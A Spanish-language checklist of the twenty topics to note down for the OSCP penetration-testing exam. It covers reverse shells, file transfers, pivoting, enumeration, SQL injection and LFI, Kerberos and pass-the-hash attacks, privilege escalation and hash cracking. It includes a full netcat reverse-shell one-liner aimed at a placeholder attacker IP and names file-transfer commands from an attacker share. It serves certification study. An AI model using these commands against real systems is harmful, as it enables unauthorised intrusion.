Top 20 Notas Prioritarias para OSCP¶
Estas son las notas que, si te faltan en medio del examen, vas a sufrir. Créalas antes del examen.
Fundamentos & Acceso¶
- Reverse Shells (One-Liners): Bash, Python, PowerShell, Netcat, PHP. (Memo:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f). - Upgrading Shells (Interactive TTY): Python
pty.spawn(),stty raw -echo,export TERM=xterm. Vital para que no se te cierre el shell con Ctrl+C. - File Transfers (Windows/Linux):
- Win:
certutil,iwr(Powershell), SMB (copy \\Attacker\share\file). - Lin:
wget,curl,nc,scp. - Improvised: Python HTTP Server, FTP Server.
- Win:
- Tunneling/Pivoting: Chisel (Cliente/Servidor) y Ligolo-ng. Esto es OBLIGATORIO para la parte de Active Directory. Aprende a hacer port forwarding rápido.
Enumeración¶
- Nmap Strategy: Escaneo rápido (
-T4 -p-) vs Escaneo Detallado (-sC -sV). No escanees todo UDP a menos que estés desesperado. - SMB Enumeration:
enum4linux,crackmapexec, login nulo, shares anónimos. Es el vector de entrada #1 en Windows. - Web Fuzzing (Directories/Files):
gobuster,feroxbuster. Ten a mano los wordlists correctos (common.txt,directory-list-2.3-medium.txt).
Web Attacks (Common)¶
- SQL Injection (Manual):
UNION SELECT, Error based, y cómo usarsqlmap(aunque está restringido, aprende a dumpear manual). - LFI (Local File Inclusion): Log Poisoning (Apache/SSH) para RCE. Wrappers de PHP (
php://filter). - CMS Vulnerabilities: WordPress (
wpscan), Joomla. Saber dónde están los config files con credenciales.
Active Directory (The Core)¶
- Initial Access / Recon:
PowerView(Get-DomainUser, Get-DomainComputer) yBloodHound(Ingestores sharphound). - Kerberoasting: Solicitar TGS para cuentas de servicio.
GetUserSPNs.py(Impacket) o Rubeus. - ASREPRoasting: Usuarios con "Do not require Kerberos preauthentication".
- Pass-the-Hash / Overpass-the-Hash: Usar hashes NTLM para autenticarse sin password plano.
crackmapexec,evil-winrm. - Silver/Golden Tickets: Persistencia y escalada final. Saber forjar tickets con el KRBTGT hash.
Privilege Escalation (Windows)¶
- Service Abuse: Servicios con permisos débiles, Unquoted Service Paths, DLL Hijacking.
PowerUp.ps1. - Potato Attacks:
PrintSpoofer,GodPotato,RoguePotatopara escalar de Service Account a SYSTEM.
Privilege Escalation (Linux)¶
- SUID / Sudo Rights: Binarios con bit SUID (+s) que permiten ejecución como root (GTFOBins es tu biblia aquí).
- Cron Jobs: Tareas programadas editables o scripts a los que les falta el path absoluto.
Password Cracking¶
- Hashcat / John: Sintaxis para reconocer y crackear formatos comunes (NTLM, MD5, SHA512, Kerberos 5). Ten un "cheatsheet de modos" (ej: NTLM = 1000).